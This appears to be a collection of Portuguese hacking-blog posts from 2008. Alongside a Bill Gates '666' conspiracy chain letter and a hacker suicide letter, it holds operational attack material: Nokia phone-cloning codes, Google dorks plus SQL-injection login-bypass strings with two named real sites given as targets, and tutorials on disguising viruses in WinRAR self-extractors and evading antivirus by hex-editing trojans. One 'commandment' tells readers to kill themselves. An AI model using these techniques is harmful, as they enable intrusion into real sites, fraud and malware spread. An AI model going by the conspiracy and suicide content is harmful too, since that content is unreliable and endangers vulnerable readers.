9. Tecle EXCELKFA. Isto abre a parede e revela outvado (isto é MUITO difícil!!), quando você chegar ao final, verá algra passagem secreta. Entre nela e tente não cair do caminho eleo realmente aterrorizante ... Até este ponto, inúmeras testemunhas de todo o mundo verificaram que isto é uma verdadeira revelação que te abre os olhos. Poderia ser uma brincadeira dos programadores de Microsoft, ou não? Não seria surpreendente que Bill Gates fosse "O Anticristo", além disso, já disse a Bíblia que alguém poderoso virá , e guiará o mundo a destruição. E Bill Gates sem dúvida tem esse tipo de poder nas suas mãos. Mais de 80% dos computadores do mundo tem Windows e DOS (inclusive os do Pentágono). Se todos esses produtos tiverem algum tipo de pequeno programa camuflado (como este do "Hall of Tortured Souls") isto pode dar-lhe o controle de configurar os arsenais nucleares, fazendo estragos nos sistemas de segurança, e nos sistemas financeiros do mundo, etc... Tudo isso pode ser feito a partir da sua sede e não está longe da realidade! Somente usando o Internet Explorer eles podem espiar o que temos no computador bit a bit cada vez que nos conectamos. Talvez o fim do mundo esteja próximo e isto seja somente a ponta do iceberg!?

Citação da Bíblia: "E ele obrigou a todos, pequenos e grandes, ricos e pobres, livres e escravos, a receber uma marca em sua mão direita ou em seu rosto, de tal forma que ninguém poderia comprar ou vender coisa alguma se não estiver marcado com o nome da fera ou com o número do seu nome. "Aqui é preciso ter sabedoria! Quem tem inteligência, calcule o número da fera, pois é um número de homem: seu número é 666."

Apocalipse 13:16-18. Isto é algo em que se deve pensar ... Porque se a Bíblia, no livro do Apocalipse diz que sem o sinal da besta ninguém poderia ser capaz de comprar, vender, fazer transações comerciais, etc ... Então ... Minha pergunta é: A Internet é hoje em dia uma necessidade para fazer negócios? Note que a Internet tambem é conhecida como a World Wide Web ou WWW ... Outra forma em que podemos escrever W eh V/ (VI) assim: W W W = VI VI VI 6 6 6 Isto me dá o que pensar ... Não vai tudo se encaminhando para a Internet? (por exemplo, comprar/vender bens, transações comerciais) E não está a Microsoft tentando sempre ter o monopólio da tecnologia de software, e agora de Internet? O Apocalipse também diz que a marca da Besta estará na mão e no rosto de cada um ... Se a Internet fosse em realidade o sinal da Besta, não estamos começando a levá-lo nas nossas mãos (usando o mouse) e em nossos rostos (monitor)? Finalmente, tudo encaixa ou nós estamos deixando levar pela imaginação? Lembre-se, o Demônio vem para enganar, roubar e destruir ... assim fique ATENTO com respeito a Bill Gates e Microsoft. "Estar ou não estar de acordo com a WWW ou a Besta", essa não é a questão. E se WWW é o 666? Ou Bill Gates é a Besta? Que vamos fazer? Cancelar nossa conexão à Internet? Não utilizar os produtos da Microsoft? Organizar uma campanha contra Bill Gates na Internet? Desconectar todos os Windows 95 para sempre? Isto não te faria nenhum bem ... pense nisto e reze, reze com devoção...

"Pergunta: Pq tanto mistério, pq tudo leva ao número 666, Pq tanta coincidência? "

A carta de Adeus de um Hacker

2008-06-14T17:07:00.000-07:00

Leia com muita atenção o texto abaixo, pois é a historia de como amei a vida e porque desisti dela (autor desconhecido).

Um adolescente normal como qualquer outro, mas com uma visão da vida pela qual muitos teriam o invejado, ele não tinha muitos amigos mas era feliz, ele não tinha uma relação com seus irmãos da maneira tradicional (ou são os melhores amigos ou os piores inimigos). Recebeu uma criação invejável, podia sair e voltar de casa a hora que quisesse, e recebia dos pais toda a atenção que necessitava. Apesar disso não saia de casa com a freqüência de um adolescente normal, não pelo fato de ser anti-social, muito pelo contrario fazia amizades muito fácil, e também não era um nerd, muito pelo contrario era o tipo do aluno vagal do qual os professores se reuniam para falar mau, gostava de entrar em brigas e odiava ir para a escola aprender as mesmas coisas todo dia. As coisas entravam muito fácil em sua cabeça, bastava uma ou duas vezes e pronto já estava decorado. Odiava a historia com tanta injustiça, escravidão dos negros (apesar dele ser branco), preconceito contra índios, judeus ou estrangeiros. Esse garoto que não tinha uma vida muito agitada, cheia de amigos e viagens. Sempre agradecia a "deus" pôr Ter uma vida tão boa, era feliz, fazia o que gostava, não tinha nenhuma doença , seus pais e familiares estavam vivos e com saúde e acreditava Ter nascido no ano certo pois estava acompanhando todo o desenvolvimento da tecnologia. Ele tinha uma vida que para outras pessoas de sua idade seria o maior tédio (mas ele adorava), Seu único medo era saber do inevitável... que um dia isso iria acabar. Talvez com a morte dos pais ou com um acidente que deixaria ele incapacitado. Esse garoto um dia se deparou com uma maquina incrível que quase não tinha limites se bem utilizada... um computador. Ele estudou muito, se formou duas vezes (Engenharia da computação e ciência da computação) eu nem preciso dizer que ele era um Hacker. Seu nome não interessa, o que ele tinha em mente? Mudar o mundo, um hacker solitário que durante dois anos (logo após a segunda formatura) se dedicou a invadir e roubar informações confidenciais dos militares americanos. Ele tinha em mente roubar informações, entender essas informações e depois divulga-las. Ele quase consegue alcançar o seu objetivo. Ele reuniu algumas informações que vão de fotos de possíveis alienígenas até plantas de equipamentos como computador, só que com uma tecnologia que possivelmente só estará disponível ao publico daqui a dez anos. Seu erro foi que depois de invadir sistemas militares os quais não podia ficar dentro mais de um minuto, ele ficou auto confiante demais, e quando estava em casa montando uma pequena home page que iria mostrar ao publico todas as informações que ele roubou, foi parado pôr agentes federais que o pegaram as 3:40h de algum dia do ano de 1996.

Você não vai encontrar nos jornais sobre mim, apenas algumas linhas que dizem "policia pega vândalo destruindo telefones públicos e descobre em sua casa centenas de cartões de créditos falsos". Eu NUNCA falsifiquei NENHUM cartão de credito, meu único ato criminoso foi invadir sistemas do governo e copiar informações confidenciais. Fui condenado a 7 anos de prisão sem direito a condicional, e fui proibido de usar computadores para o resto da vida. Outro dia eu li no jornal sobre dois garotos que mataram um mendigo queimado enquanto dormia, e que um deles era filho de um juiz criminal. Hoje pego o jornal e leio "Garotos confessam o crime mas não vão a julgamento". Chega eu cansei de viver em um mundo onde assassinos ficam nas ruas enquanto aqueles que estão em busca de um mundo melhor ficam na cadeia, cansei de Ter que aceitar o fato de que estou privado daquilo que eu amo e faço melhor, ser um hacker... Cansei de saber que os nossos governantes querem um povo ignorante o qual eles possam manipular e enganar, dizendo que estamos na terra da liberdade. Um pais que tem uma tecnologia dez anos afrente da atual, que se fosse mostrada ao publico não adiantaria o mundo em dez anos, mas com as novas descobertas em cima dessa tecnologia poderiam levar o mundo 20 talvez 30 anos afrente. Estou cansado de viver em um mundo onde o nosso próprio governo nos nega uma evolução, para poder Ter os melhores equipamentos militares que garantem a sua superioridade perante os outros países. Agora eu pergunto, como com tudo isso eles ainda podem falar sobre globalização? Hoje eu tenho vergonha de ser americano.

"Agora só me resta a esperança de que um dia, os Hackers do mundo se uniram e mostraram ao mundo... A verdade."

Quando vocês lerem isto eu já estarei morto, mas como suspiro final, digo que tenho copias escondias de tudo que descobri, e a mesma pessoa que colocara o meu manifesto na rede também colocara todas as informações pelas quais eu fui preso.

"Agora eu morro feliz pois a verdade em breve estará na boca do povo!"

Ass:

O hacker foi encontrado em sua cela com os pulsos cortados, foi levado ao hospital do presidio onde morreu as 04:32h do dia primeiro de janeiro de 1998. O seu amigo que ficou encarregado de colocar seu manifesto e as outras informações na rede, foi até o local indicado, onde estariam as copias dos arquivos confidenciais, mas foi pego pela policia federal e respondeu a processo. Foi obrigado a pagar multa no valor de US$ 80.000.

O texto acima é de autor anônimo.

Seja um Hacker

2008-06-14T17:06:00.002-07:00

Não existe nenhum livro ou material específico em como ser tornar um hacker. Não existe uma fórmula mágica e nem como se tornar um hacker do dia para a noite. Um hacker se faz após anos de muita leitura e estudo. Basicamente toda a informação que você necessita para se tornar um hacker já está disponível na rede, o que você tem que fazer é vasculhar e achar as informações. Está certo que isto não é uma tarefa muito fácil, mas quem disse que ser um hacker é fácil?

Qualquer um pode ser um hacker ou médico ou engenheiro ou etc. Desde que você se informe e estude.

Para você que algum dia pensa em ser um hacker aqui estão algumas dicas no que você deve concentrar seus esforços e começar a aprender:

Conheça a fundo um sistema operacional como o Windows 95, Unix, Windows NT ou MacOS. Com ele é que você ira entender como quebrar a segurança ou então como funciona a segurança, no caso do Windows NT que possui certificado C2 de nível de segurança, é mais difícil, mas não impossível.

Aprenda uma linguagem de programação como VisualBasic (específica para a plataforma Intel) ou C (para qualquer plataforma). Você escrevendo pequenos programinhas pode deixar um programa rodando em paralelo para descobrir a senha de acesso.

Aprenda a usar o comando TELNET do Unix para se logar em máquinas remotamente e copiar aquele programa oculto que falta para você entrar no sistema ou então cadastrar um usuário fantasma para entrar no sistema.

Aprenda como funcionam as redes e quais são os tipos de redes existente. Hoje em dia, a maioria dos computadores estão interligados e você conhecendo as arquiteturas e protocolos utilizados facilita bastante o acesso.

Aprenda o protocolo TCP/IP, o protocolo que é usado hoje em dia na Internet. Isto se você quiser ser um hacker da net.

Existem livros que explicam como os grandes hackers entraram nos sistemas fechados, desta forma você pode tirar algumas idéias em como abrir sistemas fechados. Para se ter uma idéia o primeiro livro que li sobre este assunto foi Crime por Computador de Donn B. Parker de 1977, isto mesmo 1977. Para se ter uma idéia, um chefe de contabilidade de uma pequena firma desviou um milhão de dólares, usando um computador para planejar e realizar o seu desfalque, ou então, um jovem ladrão conseguiu acesso ao computador de cuma companhia telefônica e em dois anos roubou cerca de um milhão de dólares em equipamentos. Foi preso porque um de seus empregados o denunciou. Depois de passar 40 dias na cadeia, voltou a trabalhar - desta vez, como consultor de segurança de computadores. Hoje em dia, a história mais conhecida foi a prisão do hacker Kevin Mitnick em 25 de fevereiro de 1995. Este hacker capturado pelo FBI com auxílio do especialista em segurança de computadores Tsutomu Shimomura (um ex-hacker). Este história já rendeu dois livros, um deles o Contra-Ataque foi escrito por Tsutomu Shimomura e John Markoff, um experiente jornalista especializado em tecnologias e o outro livro o Jogo do Fugitivo de Jonathan Littman que é um jornalista bem relacionado no submundo da rede. Qualquer um desses livros atrai com certeza a curiosidade sobre histórias verídicas e temos a sensação de estar no limiar entre a ficção científica e a realidade.

Regras Hackers

2008-06-14T17:06:00.001-07:00

01- Nunca destrua nenhum sistema.

02- Nunca altere nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada posteriormente.

03- Não compartilhe com ninguém seus projetos hackers.

04- Em uma BBS, não é aconselhável que você discuta seus projetos hackers. BBS podem ser monitoradas pelo governo.

05- Nunca dê nomes ou telefones reais em uma BBS.

06- Nunca deixe seu apelido em um sistema que você entrou.

07- NÃO entre em computadores governamentais.

08- Nunca converse sobre seus planos hackers com outra pessoa do telefone de sua casa.

09- Seja atento. Mantenha todo o seu material hacker em um lugar seguro.

10- Para se tornar um verdadeiro hacker você deve simplesmente praticar.

Mandamentos Hackers

2008-06-14T17:05:00.001-07:00

01- Descobriu algo novo? OLHE!

02- NÃO APAGUE, pense no que seria melhor; ter acesso a um provedor ou detona-lo?

03- NÃO MODIFIQUE NADA, ao menos que queira que saibam que esteve lá.

04- Nunca tente um su root direto! Isso fica logado...

05- Não fique dando telnet ou pegando mail usando acesso dos outros!

06- Nunca subestime um sysop.

07- Escolha horas entre 24:30 as 6:00.

08- Uma vez lá dentro, tente dominar o lugar, e' claro, com cautela.

09- Não confie em ninguém. (salvo seu cachorro ou sua planta).

10- Se pegar a senha do root de algum provedor e não souber o que fazer, MATE-SE!

11- Nunca teste vírus no seu próprio HD.

12- É bom preparar muito bem uma estratégia antes de atacar.

13- Use os computadores de sua universidade (é mais seguro).

14- Não fique distribuindo informações para ninguém ou dados sobre o que você pegou.

15- NÃO OBEDEÇA REGRAS. Claro que estas têm que ser cumpridas.

16- Não tenha pena de ninguém.

17- Pc usa o MS-DOS ou o Windows? Não conte pra ninguém...

18- Pc usa o UNIX ou LINUX? Esteja certo que esta bem seguro...

19- Não crie laços afetivos com a vítima.

20- Aprenda o máximo que puder com quem sabe mais! Não se meta a besta direto.

ÚLTIMO- Não se submeta a nenhum sistema hierárquico. Administradores fedem.

Clonando Celular NOKIA

2008-06-14T17:04:00.001-07:00

ANTES DE MAIS NADA QUERO DIZER A PALAVRA "CLONAGEM" ESTA EXPRESSA DE UM

MODO COMPARATIVO COM RELAÇÃO A CLONAGEM VERDADEIRA. OU SEJA, O QUE VAMOS

FAZER É SIMPLESMENTE REPROGRAMAR NOSSO CELULAR PARA QUE ATUE COMO OUTRO.

CLONAGEM:

--------

ANTES DE CLONAR NOSSO TELEFONE TEMOS QUE TER 3 COISAS FUNDAMENTAIS PARA

O BOM FUNCIONAMENTO:

CÓDIGO DE ÁREA

ID

MIN (NÚMERO INTERNO DO APARELHO MÓVEL)

CÓDIGO DE ÁREA:

--------------

ESTE CÓDIGO É DESIGNADO PARA CADA CIADADE DE CADA PAÍS.

SYSTEM ID:

--------

IDENTIFICAÇÃO DO SISTEMA, ESTE É UM NÚMERO DE 5 DIGITOS, OU SEJA:

POR EXEMPLO: 52693

MIN

---

ESTE NÚMERO É SIMPLESMENTE O NÚMERO DO CELULAR.

CLONANDO CELULARES NOKIA

-----------------------

MODELOS - 21XX, 51XX, 61XX, 636, 639, 918.

1) PRESSIONE *#639#

2) PRESSIONE O NÚMERO DO CELULAR DE 10 DÍGITOS, PRESSIONE OK

3) TECLE O sys id, PRESSIONE OK

4) O TELEFONE SERÁ RELIGADO

MODELOS - P1000, 100, PT101, PT128, PT228, PT232.

1) LIGUE O TELEFONE

2) PRESSIONE *3001#12345

3) A TELA MARCA 00

4) MANTENHA PRESSIONADO CLR UNS SEGUNDOS

5) TELCE O NÚMERO DE CELULAR DE 10 DÍGITOS

6) PRESSIONE store, 02, CLR (POR ALGUNS SEGUNDOS)

7) PONHA O sys id

8) PRESSIONE *1*10333*05*05, PRESSIONE store

9) PRESSIONE 03, PRESSIONE store

10) PRESSIONE CLR

11) DESLIGUE O TELEFONE PARA TERMINAR A PROGRAMAÇÃO.

MODELOS - 232, 239, 515.

1) PONHA *3001#12345, PRESSIONE STO 00

2) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 beeps)

3) PONHA 911#5551212#0 * 12345, STO, 01, STO

4) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 bepps)

5) PONHA O CÓDIGO DA ÁREA E O NÚMERO DO TELEFONE, PRESSIONE STP, 01, STO

6) PRESSIONE E MANTENHA PRESSIONADO CLR (2 beeps)

7) PRESSIONE *1*1 *333*15*05# 0111 * 1 ,STO, 01, STO

8) PRESSIONE E MATENHA PRESSIONADO CLR (2 beeps)

9) DESLIGUE E LIGUE O APARELHO.

Dicionário Hacker

2008-06-14T17:02:00.000-07:00

Abaixo segue uma lista de termos usados pelos hackers, lammers, usuários, povão, resto, todo mundo que navega na net: Letra A acceptable use policy - Regras de boa conduta para a utilização correta da rede e seus serviços. Pode ser um documento distribuído ao novo utilizador de um determinado sistema. anonymous - Anônimo. Normalmente utilizado para o login num servidor FTP, para indicar que se trata de um utilizador não registado na maquina em questão. A password a fornecer deve ser o endereço eletrônico. ANSI - Conjunto de normas para a transmissão de caracteres de controle para um terminal, permitindo: tratamento de cores e outros atributos, movimento do cursor, som, etc. terminais. archie - Ferramenta que permite a procura de arquivos e informações em servidores FTP. Indica-se ao archie o nome do arquivo (ou parte dele) que deseja encontrar e ele fornece o nome (endereço) dos servidores onde pode encontrar. arpanet - Rede de computadores criada em 69 pelo Departamento de Defesa norte-americano, interligando na altura instituições militares. Em meados dos anos 70 varias grandes universidades americanas aderiram à rede, que deu lugar à atual Internet. article - Artigo. Um texto existente na Usenet/News. artigo - Um texto existente na Usenet/News. ASCII - Norma para a codificação de caracteres através de números binários, utilizada em diferentes computadores. Define a codificação dos caracteres com códigos de 0 a 127. auto-estrada da informação - Um ligação ou conjunto de ligações entre computadores, formando uma rede de redes, de preferencia com meios de comunicação extremamente rápidos. Um nome abusivamente usado por vezes (sobretudo nos meios tradicionais) para designar a(s) rede(s) atualmente existente(s) (e em particular a Internet), pois uma grande parte delas ainda tem muitas interligações bastante lentas, longe do futuro próximo em que tudo se contara' em dezenas de Mbps e Gbps... :-) AUP - ver acceptable use policy. auto-estrada eletrônica - Ver auto-estrada da informação. Letra B Baud - Quantidade de informacoes que sao transferidas entre dois computadores interligados. Bios - É a memoria basica da maquina. Contem instrucoes primarias para o funcionamento correto da maquina. É na BIOS que fica armazenada a informacao de que em seu PC existe um teclado, por exemplo. Bug - Erro em algum programa ou arquivo. backbone - Estrutura de nível mais alto em uma rede composta por várias sub-redes. bandwidth - Largura de Banda. Termo que designa a quantidade de informação passível de ser transmitida por unidade de tempo, num determinado meio de comunicação (fio, onda radio, fibra óptica, etc.). Normalmente medida em bits por segundo, kilobits por segundo, megabits por segundo, kilobytes por segundo, megabytes por segundo, etc. BBS - Bulletin Board System. Computador (1 ou vários) que permitem que os usuários se liguem a ele através de uma linha telefônica e onde normalmente se trocam mensagens com outros usuários, se procuram arquivos e programas ou se participa em conferencias (fóruns de discussão) divulgadas por varias BBS. Digamos que uma BBS esta' para a Internet assim como uma aldeia está para o Mundo. bitnet - Rede mundial acessível pela Internet, mas distinta desta, com características educacionais. browser - Um programa que permite visualizar e utilizar uma dada base de dados, distribuída ou não por vários computadores. Termo normalmente aplicado para os programas que permitem navegar no World-Wide-Web. BTW - Sigla do inglês "By the Way" (Já' agora / Por falar nisso, etc.). Usada em textos de correio eletrônico, artigos de news, etc. Letra C Cavalo de Tróia - É uma especie de virus (voce programa para fazer o que quiser). Muito mais potente que um virus comum que tem como unica funcao destruir computadores. cello - Um programa (browser) para navegar no WWW. Criptografia - Torna algum programa ou mensagem secreta, ou seja, so' podera' ler aquela mensgaem ou executar aquele programa a pessoa que tiver a chave criptografica (que serve como uma senha) para desencriptar-los. CERN - Centre Europeen de Recherche Nucleaire. Centro Europeu de Investigação Nuclear. Um dos centros mais importantes da Internet (e, claro, da investigação física). Nele trabalham centenas (ou mesmo milhares?) de investigadores e a sua "jóia da coroa" é um grande circulo de aceleração de partículas com 27 Km de diâmetro, que fica por baixo de Genebra, na Suíça, atualmente o maior acelerador de partículas existente no Mundo. CERT - Computer Emergency Response Team. Organismo criado em 1988 pela Darpa, visando tratar questões de segurança em redes, em particular na Internet. chain letter - Uma carta que é recebida por alguém e enviada para varias pessoas e assim sucessivamente até que se torna excessivamente difundida. Normalmente o seu texto incita à difusão da carta por outras pessoas. chain mail - Ver "chain letter". ciberespaco - Por ciberespaco designa-se habitualmente o conjunto das redes de computadores interligadas e de toda a atividade ai existente. É uma espécie de planeta virtual, onde as pessoas (a sociedade da informação) se relacionam virtualmente, por meios eletrônicos. Termo inventado por William Gibson no seu romance Neuromancer. client - Cliente. No contexto Cliente/Servidor, um Cliente é um programa que pede um determinado serviço (por exemplo, a transferencia de um arquivo) a um Servidor, outro programa. O Cliente e o Servidor podem estar em duas maquinas diferentes, sendo esta a realidade para a maior parte das aplicações que usam este tipo de interação. cliente - Ver client. conexão - Ligação do seu computador a um computador remoto. correio caracol - Tradução do inglês "snail mail". Ver snail mail. correio eletrônico - Correio transmitido por meios eletrônicos, normalmente, redes informáticas. Uma carta eletrônica contem texto (como qualquer outra carta) e pode ter, eventualmente, anexo um ou mais arquivos. crosspost - Fazer o crosspost de... Ato de enviar para um grupo de news um artigo (ou parte) já' publicado (ou a publicar na mesma altura) noutro grupo. cracker - Indivíduo que faz todo o possível e o impossível para entrar num sistema informático alheio, quebrando sistemas de segurança, para assim poder causar danos. cyberspace - Ver ciberespaco. Letra D daemon - Programa que corre (que foi lançado) num computador e esta' (sempre) pronto a receber instruções/pedidos de outros programas para a execução de determinada ação. Defaults - Diz-se que é a configuracao normalmente utilizada por um equipamento ou programa. domain - Domínio. Nome à direita do símbolo @ num endereço eletrônico. Por exemplo: o dominio do meu provedor e' hotmail.com débito - Quantidade de informação por unidade de tempo. dial-IN - Designação de um tipo de ligação ou de um ato de ligação à Internet, neste caso pelo estabelecimento de uma chamada (telefônica - Dial) para um computador, através de, por exemplo, um modem. dial-UP - Ver Dial-IN. DNS - Sigla de Domain Name Server. Designa o conjunto de regras e/ou programas que constituem um Servidor de Nomes da Internet. Um servidor de nomes faz a tradução de um nome alfanumérico (p. ex. microbyte.com) para um numero IP (p. ex. 192.190.100.57). Por exemplo, no DNS brasileiro, gerem-se todos os nomes terminados em br. Qualquer outro nome será' também traduzido pelo mesmo DNS, mas a partir de informação proveniente de outro DNS (isto se essa informação não tiver sido previamente obtida). domínio - Ver domain. domínio publico - Algo que esta' no domínio publico (software, p. ex.) é algo que se pode copiar, cortar, colar, queimar, distribuir, deleitar e normalmente utilizar sem pagar o que quer que seja! :-) Normalmente deve ser dado o devido credito ao(s) autor(es) desse algo. DOOM - Um dos mais famosos jogos distribuídos em shareware na Internet. Os seus criadores (3 jovens) ficaram rapidamente milionários! :-) Tem vários níveis, efeitos sonoros, é a 3 dimensões e permite que vários jogadores joguem simultaneamente, cada um no seu computador. Um verdadeiro clássico no gênero (tiros e explosões). download - Fazer o download de um arquivo. Ato de transferir o arquivo de um computador remoto para o seu próprio computador, usando qualquer protocolo de comunicações. Letra E Endereço IP - É o endereco que uma maquina possui ao se conectar na Internet. A cada vez que voce se conecta, voce obetem um novo endereco IP. edu - Sufixo presente em variados endereços na Internet e que designa instituições de ensino/educação (edu=educational). elm - Um programa/leitor de correio eletrônico para ambientes Unix (se bem que também se possam encontrar versões para outros sistemas operativos). À base de menus com escolha de opções por letras e teclas de cursor. email - Eletronic Mail. Correio Eletrônico. email address - Endereço (de correio) eletrônico. Ver Endereço eletrônico. emoticon - ver smiley. endereço eletrônico - É um cadeia de caracteres, do tipo "nome_usuario@qqcoisa.empresax.br" (sem aspas) que identifica univocamente um determinado utilizador dentro da Internet e, em particular, a sua caixa de correio eletrônica. Qualquer envio de correio eletrônico para esse utilizador deve ser feito para o seu endereço eletrônico. ethernet - Uma das arquiteturas possíveis em redes locais. As redes Ethernet usam normalmente cabos coaxiais que interligam vários computadores. Cada um deles acede à rede em concorrência com os outros, existindo depois regras/convenções que permitem designar qual o computador que deve transmitir informação num determinado instante. A informação pode ser transmitida em modo "Broadcast", ou seja, para todos os outros computadores da rede e não apenas para um só'. eudora - Um programa/leitor de correio eletrônico muito completo, existente em varias plataformas, entre elas, os Macintosh e PC (Windows). Recomendado. Letra F firewall - Parede de Fogo. Medida de segurança que pode ser implementada para limitar o acesso de terceiros a um determinada rede ligada à Internet. Os mecanismos de implementação são variados

Hackear site po strings

2008-06-02T10:43:00.000-07:00

O SITES
Tutorial Invadindo sites

Invadindo sites.

Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “.
Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.

1) Acesse www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:

allinurl:admin/index.asp

allinurl:admin/default.asp

allinurl:admin/admin.asp

allinurl:admin/login.asp

allinurl:/admin/entrar.asp

allinurl:/admin/default.asp

allinurl:/admin/index.asp

allinurl:/admin/login.asp

allinurl:/admin/password.asp

allinurl:/admin/senha.asp

allinurl:/login/login.asp

allinurl:/adm/login.asp

allinurl:/adm/index.asp

allinurl:/adm/default.asp

allinurl:/login/index.asp

allinurl:/login/default.asp

allinurl:/webmaster/login.asp

allinurl:/webadmin/default.asp

allinurl:/webadmin/index.asp

allinurl:/webadmin/default.asp

allinurl:/menu_admin/default.asp

allinurl:/menu_admin/index.asp

allinurl:/menu_admin/login.asp

allinurl:/noticias/admin/

allinurl:/news/admin/

allinurl:/cadastro/admin/

allinurl:/portal/admin/

allinurl:/site/admin/

allinurl:/home/admin.asp

allinurl:/home/admin/index.asp

allinurl:/home/admin/default.asp

allinurl:/home/admin/login.asp

allinurl:/web/admin/index.asp

allinurl:/web/admin/default.asp

allinurl:/web/admin/login.asp

allinurl:/home/adm/login.asp

allinurl:/home/adm/senha.asp

allinurl:/home/adm/index.asp

allinurl:/home/adm/defaul.asp

allinurl:/menu/admin/index.asp

allinurl:/menu/admin/default.asp

allinurl:/menu/admin/login.asp

allinurl:/menu/admin/admin.asp

allinurl:/painel/admin/admin.asp

allinurl:/painel/admin/login.asp

allinurl:/painel/admin/index.asp

allinurl:/painel/admin/default.asp

allinurl:/site/admin/default.asp

allinurl:/site/admin/index.asp

allinurl:/site/admin/login.asp

allinurl:/asp/admin/login.asp

allinurl:/asp/admin/index.asp

allinurl:/pedidos/admin/index.asp

allinurl:/pedidos/admin/login.asp

allinurl:/compras/admin/

allinurl:/clientes/admin/

allinurl:/busines/admin/

allinurl:/area_restrita/admin.asp

allinurl:/area_restrita/login.asp

allinurl:/area_restrita/index.asp

allinurl:/acesso/admin.asp

allinurl:/acesso/admin/default.asp

allinurl:/acesso/admin/index.asp

allinurl:/post/admin/default.asp

allinurl:/post/admin/

allinurl:/post/admin/index.asp

allinurl:/post/admin/login.asp

allinurl:/eshop/admin/

allinurl:/eshop/admin.asp

allinurl:/eshop/admin/default.asp

allinurl:/eshop/admin/index.asp

allinurl:/comercio/admin.asp

allinurl:/comercio/admin/default.asp

allinurl:/comercio/admin/index.asp

allinurl:/news/admin/login.asp

allinurl:/news/admin/default.asp

allinurl:/news/admin/index.asp

allinurl:/imprensa/login.asp

allinurl:/imprensa/admin.asp

allinurl:/imprensa/admin/default.asp

pós voces pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo Wink )

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

aqui são alguns sites que é facil de hackear

ESSE FOI INJVADIDO FACIL
http://www.wfbotai.com/wfbotai/webmaster/main.asp

LOGIN: b' or ' 1='

SENHA: b' or ' 1='

http://www.indfumco.com/new/admin/index.asp?action=mainmenu

LOGIN: b' or ' 1='

SENHA: b' or ' 1='

imagens de sites hackeados por strings

http://img407.imageshack.us/img407/5141/sql2yq5.jpg

http://img458.imageshack.us/img458/7839/sql1gw7.jpg

localizar pessoa por ip

2008-04-18T13:59:00.001-07:00

Escaniamento

2008-04-18T13:46:00.000-07:00

Este é o método mais antigo, e ainda hoje um dos principais métodos utilizados por todos os programas anti-vírus do mercado.
Envolve o escaneamento em busca de vírus já conhecidos, isto é aqueles vírus que já são conhecidos das empresas de anti-vírus.
Uma vez que as empresas recebem uma amostra de um vírus eles o desassemblam para que seja separada uma string (um grupo de caracteres seqüenciais) dentro do código viral que só seja encontrada nesse vírus, e em nenhum programa normal à venda no mundo. Essa string, uma espécie de impressão digital do vírus, passa a ser distribuída semanalmente pelos fabricantes, dentro de suas vacinas.
O "engine" do anti-vírus usa esse verdadeiro banco-de-dados de strings para ler cada arquivo do disco, um a um, do mesmo modo que o sistema operacional lê cada arquivo para carregá-lo na memória e/ou executá-lo. Se ele encontrar alguma das strings, identificadoras de vírus, o anti-vírus envia um alerta para o usuário, informando da existência do vírus.

Esse método não pode, entretanto, ser o único que o anti-vírus deva utilizar. Confiar apenas no conhecimento de vírus passados, pode ser pouco, deixando o usuário totalmente à descoberto quanto a novos vírus. Assim os fabricantes de anti-vírus passaram a utilizar de métodos adicionais, que permitissem detectar vírus novos, onde o escaneamento citado neste tópico não está ainda disponível.

Camuflando Virus com o Winrar

2008-04-18T13:45:00.000-07:00

1º Você deve ter o Winrar instalado. Clique com o butão direito do mouse sobre o executavel (o virus) e vai em Adicionar para o arquivo...

2º Irá abrir esta janela, mude de .rar para .exe

3º Clique na aba Avaçado e depois em Opções SFX..., Poem o nome do arquivo que sera executado, no caso o nome do virus que você esta camuflando.

4º Clique na aba Métodos e marque as Opções Ocultar Tudo e Ignorar arquivos existentes.

5º Clique na aba Texto e Icone e clique em Procurar...

6º Use um icone que sua vitima não possa desconfiar no tutorial eu usei de uma imagem. (Baixar Icones 'Senha: www.redehacker.com')

7º Depois disso e so clicar em OK e OK e ficara como na imagem abaixo.

Camuflando Virus por números Hexadecimais

2008-04-18T13:44:00.002-07:00

Antes de começarmos eu sei que irá haver muitas perguntas sobre o por que de se editar hexadecimalmente um trojan, tudo está diretamente relacionado à como o vírus é detectado pelo anti-vírus... O seu anti-vírus procura pelo código hexadecimal dentro dos programas para ver se batem com os números hexadecimais que ele tem guardado em sua assinatura (aquele arquivo que é atualizado constantemente), se coincidir os números, é vírus hehe. Tendo essa idéia em mente, uma saída simples é essa: altere esse código que está cusando problemas! Como? vamos lá:

Precisamos de:
-Um editor hexadecimal (usaremos o HEXPlorer por ser freeware) Download
-Um server de qualquer trojan
-E por último um anti-vírus

Simplesmente após criar seu server (deiche seu anti-vírus desligado), abra ele com o Hexplorer, vários números aparecerão. Role a tela até mais ou menos a metade, selecione TODOS os números dalí para baixo.
Após feito isso, note um botão no canto superior direito, ele tem o formato de um ZERO, clique nele, perceba que todos os números selecionados viraram ZEROS.

